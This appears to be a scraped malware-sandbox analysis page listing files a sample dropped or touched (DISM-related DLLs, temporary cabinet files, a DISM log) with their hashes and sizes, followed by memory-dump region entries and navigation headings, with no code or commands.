c26d56feb5acad63372f9a838c9eabf8a2134b3085cf35cdbf5e7dfde7dcb2557d59d0e34972913c1406056a280efa2fd6302b4b36a4da1536c568c658e50ded

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JIH1AB02\favicon[1].ico

Filesize
1KB

MD5
8e39f067cc4f41898ef342843171d58a

SHA1
ab19e81ce8ccb35b81bf2600d85c659e78e5c880

SHA256
872bad18b566b0833d6b496477daab46763cf8bdec342d34ac310c3ac045cefd

SHA512
47cd7f4ce8fcf0fc56b6ffe50450c8c5f71e3c379ecfcfd488d904d85ed90b4a8dafa335d0e9ca92e85b02b7111c9d75205d12073253eed681868e2a46c64890

Download Submit
C:\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\DismCore.dll

Filesize
283KB

MD5
f2b0771a7cd27f20689e0ab787b7eb7c

SHA1
eb56e313cd23cb77524ef0db1309aebb0b36f7ef

SHA256
7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f

SHA512
5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a

Download Submit
C:\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\en-US\CbsProvider.dll.mui

Filesize
32KB

MD5
724ee7133b1822f7ff80891d773fde51

SHA1
d10dff002b02c78e624bf83ae8a6f25d73761827

SHA256
d13f068f42074b3104987bfed49fbf3a054be6093908ed5dea8901887dddb367

SHA512
1dfd236537d6592a19b07b5e1624310c67adff9e776e6d2566b9e7db732588988f9ae7352df6c3b53c058807d8ed55fafc2004a2d6dc2f3f6c9e16445699f17b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\en-US\CompatProvider.dll.mui

Filesize
12KB

MD5
9085b83968e705a3be5cd7588545a955

SHA1
f0a477b353ca3e20fa65dd86cb260777ff27e1dd

SHA256
fe0719cf624e08b5d6695ee3887358141d11316489c4ea97d2f61a4d2b9060cd

SHA512
b7f12f7ac1e6942f24f4bf35444f623cc93f8a047ebc754b9599d5df16cab4d3745729d11b4a3abfdc06a671e55ac52cac937badd808825906f52885f16f2c1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\en-US\DismCore.dll.mui

Filesize
6KB

MD5
f18044dec5b59c82c7f71ecffe2e89ab

SHA1
731d44676a8f5b3b7ad1d402dfdbb7f08bdc40c6

SHA256
a650578a4630e1a49280dc273d1d0bbdca81664a2199e5ab44ec7c5c54c0a35e

SHA512
53c23acddab099508b1e01dcc0d5dc9d4da67bc1765087f4a46b9ac842de065a55bac4c6682da07f5a1d29a3d0c1d92a4310e6b0f838740d919f8285911fa714

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6652.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6701.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3QJ0PG94QXPZE5VGRRXR.temp

Filesize
7KB

MD5
c1a5ba8342a4b54aa2502f35e6ff644e

SHA1
15ce1f61de22c63002bc1f4d88b97e6f6cfa2a46

SHA256
d7465ba68cf1316e2f64872d5dc5eebf36ae2689b412d785c14cc2577fd5d121

SHA512
88826bc6d600b6bbf846841e0dfca9deee3abf95c010ad7b994890b034e4f759db0812771ae907a30abae57976ea5600f60bf2b41fbd0ca5d27f37ef1b0eb101

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ef5a0581c865d79ae59ba47aca7824f

SHA1
a78c7d9c82f5380548cc629798e31b4f3a31e1d9

SHA256
6a1743e8c8ca85e871e2f4b56044cebad16e2bb07e3d4634f147c49da4155a18

SHA512
34f5a9fd1805c5d1c435ec33f92e79f17b17ceee5dd347ca6b48e140dc149f82c9b409ed3d17c1bdea534cf19ed6886e540de2bbb3e81a9a2102d372c9596f42

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
156KB

MD5
5a8bec996590340a30b7bd790daf6e5b

SHA1
1ed3b7fbe76287584bbb93b509fd59519a52c0ad

SHA256
213e96500848fc00e21c0e3a04fa90e3aca5388efe9b33826842801d12262402

SHA512
66603699bdabf638b7982bfa887ebcfad2e839e3f8984360cb0c2207a04c35eac82af69e054bb6afb14975dacf72223604e7ce9e0e0e18775736aea504505a56

Download Submit
\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\CbsProvider.dll

Filesize
744KB

MD5
efcb002abc3529d71b61e6fb6434566c

SHA1
a25aca0fc9a1139f44329b28dc13c526965d311f

SHA256
b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd

SHA512
10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687

Download Submit
\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\CompatProvider.dll

Filesize
179KB

MD5
6a4bd682396f29fd7df5ab389509b950

SHA1
46f502bec487bd6112f333d1ada1ec98a416d35f

SHA256
328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb

SHA512
35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751

Download Submit
\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\LogProvider.dll

Filesize
104KB

MD5
62de64dc805fd98af3ada9d93209f6a9

SHA1
392ba504973d626aaf5c5b41b184670c58ec65a7

SHA256
83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc

SHA512
7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28

Download Submit
\Users\Admin\AppData\Local\Temp\9A80D814-E6A1-47EA-AD83-BF13793F5BB3\OSProvider.dll

Filesize
124KB

MD5
e7caed467f80b29f4e63ba493614dbb1

SHA1
65a159bcdb68c7514e4f5b65413678c673d2d0c9

SHA256
2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c

SHA512
34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e

Download Submit
memory/1580-1625-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1623-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1646-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1880-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1648-0x0000000000260000-0x0000000000280000-memory.dmp

Filesize
128KB

Download
memory/1580-1881-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1641-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1580-1643-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1635-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1634-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1626-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1879-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1733-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1617-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1622-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1728-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1729-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1731-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1732-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1619-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1730-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1621-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1632-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1639-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1580-1637-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1672-94-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1672-91-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/1672-92-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1672-90-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1672-95-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/1672-89-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/1672-93-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1676-104-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/1676-105-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/1676-102-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/1676-109-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/1676-107-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/1676-108-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/1676-103-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/1712-1-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/1712-0-0x0000000000F00000-0x000000000184C000-memory.dmp

Filesize
9.3MB

Download
memory/1712-27-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/1712-2-0x000000001B9E0000-0x000000001BA60000-memory.dmp

Filesize
512KB

Download
memory/2096-115-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2096-119-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2096-118-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/2096-116-0x00000000028B0000-0x0000000002930000-memory.dmp

Filesize
512KB

Download
memory/2096-117-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2304-130-0x0000000001E40000-0x0000000001EC0000-memory.dmp

Filesize
512KB

Download
memory/2304-126-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-127-0x0000000001E40000-0x0000000001EC0000-memory.dmp

Filesize
512KB

Download
memory/2304-164-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2304-129-0x0000000001E40000-0x0000000001EC0000-memory.dmp

Filesize
512KB

Download
memory/2304-128-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2484-171-0x0000000002820000-0x0000000002828000-memory.dmp

Filesize
32KB

Download
memory/2484-175-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2484-174-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2484-173-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2484-172-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2620-68-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2620-67-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2620-69-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2620-51-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2620-50-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2620-44-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download
memory/2620-66-0x000007FEF1E50000-0x000007FEF27ED000-memory.dmp

Filesize
9.6MB

Download
memory/2620-45-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2620-46-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/2684-82-0x0000000002C50000-0x0000000002CD0000-memory.dmp

Filesize
512KB

Download
memory/2684-80-0x0000000002C50000-0x0000000002CD0000-memory.dmp

Filesize
512KB

Download
memory/2684-79-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-78-0x0000000002C50000-0x0000000002CD0000-memory.dmp

Filesize
512KB

Download
memory/2684-83-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-77-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2684-76-0x000007FEF14B0000-0x000007FEF1E4D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-75-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2684-81-0x0000000002C50000-0x0000000002CD0000-memory.dmp

Filesize
512KB

Download
memory/2760-28-0x000000013F530000-0x000000013F75C000-memory.dmp

Filesize
2.2MB

Download
memory/2760-96-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-36-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-43-0x000000001AD20000-0x000000001ADA0000-memory.dmp

Filesize
512KB

Download
memory/2796-10-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2796-11-0x000000001A9C0000-0x000000001AA40000-memory.dmp

Filesize
512KB

Download
memory/2796-37-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2796-9-0x0000000000350000-0x00000000005A0000-memory.dmp

Filesize
2.3MB

Download
memory/2824-203-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2928-125-0x0000000000590000-0x0000000000610000-memory.dmp

Filesize
512KB

Download
memory/2928-35-0x0000000001050000-0x000000000109A000-memory.dmp

Filesize
296KB

Download
memory/2928-106-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2928-38-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads